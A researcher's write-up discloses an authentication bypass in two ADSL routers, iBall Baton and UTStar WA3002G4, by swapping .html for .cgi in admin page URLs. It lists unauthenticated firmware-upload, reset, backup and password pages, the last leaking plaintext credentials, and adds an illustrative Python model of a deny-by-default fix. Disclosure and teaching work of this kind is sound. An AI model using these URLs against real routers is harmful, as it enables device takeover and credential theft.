iBall Baton ADSL2+ Home Router, UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass
Hi, I hope you have already gone through my first router exploitation write-up, Exploiting Router Authentication through Web Interface (CVE-2017-6558). While researching router exploitation again, I found a similar bug in two other products, iBall Baton ADSL2+ Home Router and UTStar WA3002G4 ADSL Broadband Modem, that allowed me to bypass admin panel authentication. These products are from two different vendors, but the vulnerability is the same.
I was looking for methods to bypass authentication on routers commonly used in my country. First I opened the iBall Baton ADSL2+ Home Router admin page. The admin panel is protected by password authentication. I know some routers use CGI scripts, like PayPal uses on its websites. I tried to access common pages in the router by appending .cgi at the end of the URL. Luckily, the page info.cgi opened without asking for authentication. I found a few other pages that can be accessed in the same way.
Steps
- Suppose 192.168.1.1 is the router IP, then the password reset page is http://192.168.1.1/password.html by default
- This page is protected, but the protection can be bypassed by changing the URL extension to .cgi: http://192.168.1.1/password.cgi
In the case of UTStar, the source code of the password.cgi page contains the usernames and corresponding passwords in plain text. We can use this password to log in to the admin panel!
Some pages we can directly access:
- http://192.168.1.1/info.cgi – Status and details
- http://192.168.1.1/upload.cgi – Firmware Upgrade
- http://192.168.1.1/backupsettings.cgi – perform backup settings to PC
- http://192.168.1.1/pppoe.cgi – PPPoE settings
- http://192.168.1.1/resetrouter.cgi – Router reset
- http://192.168.1.1/password.cgi – password settings
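The behaviour above is consistent with an authentication check keyed to a list of URLs rather than to the page behind them; that cause is an assumption, since the firmware's request handling is not shown here. The following added example (not code from this write-up or from either vendor) models such a check beside a deny-by-default one; `/login.html` and all function names are hypothetical.

```python
# Illustrative model only: the firmware's real request handling is not shown
# on the page. Page names come from the write-up; everything else is assumed.
from posixpath import splitext

PAGES = {"info", "upload", "backupsettings", "pppoe", "resetrouter", "password"}
PUBLIC = {"/login.html"}  # hypothetical: the only page served without a session
PROTECTED_URLS = {f"/{p}.html" for p in PAGES}  # weak design: list of guarded URLs


def resolve(path):
    """Map /name.html or /name.cgi to the same page handler name, else None."""
    stem, ext = splitext(path)
    name = stem.lstrip("/")
    if ext in (".html", ".cgi") and name in PAGES:
        return name
    return None


def dispatch_weak(path, authenticated):
    """Auth is checked against a URL list, so an alias of a page is unguarded."""
    if path in PROTECTED_URLS and not authenticated:
        return 401
    return 200 if resolve(path) else 404


def dispatch_hardened(path, authenticated):
    """Deny by default: every path needs a session unless explicitly public."""
    if path in PUBLIC:
        return 200
    if not authenticated:
        return 401
    return 200 if resolve(path) else 404


def audit(dispatch):
    """Return the paths a dispatcher serves to an unauthenticated client."""
    candidates = [f"/{p}{ext}" for p in sorted(PAGES) for ext in (".html", ".cgi")]
    return [c for c in candidates if dispatch(c, authenticated=False) == 200]


if __name__ == "__main__":
    print("weak:", audit(dispatch_weak))          # every .cgi alias is exposed
    print("hardened:", audit(dispatch_hardened))  # nothing is exposed
```

The same `audit` pattern works as a regression test for a web interface: enumerate every route and alias, request each without a session, and fail the build if anything outside the public list answers.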
Products Affected
- UTStar WA3002G4 ADSL Broadband Modem – Firmware Version: WA3002G4-0021.01
- iBall Baton ADSL2+ Home Router – Firmware version: FW_iB-LR7011A_1.0.2
Gem George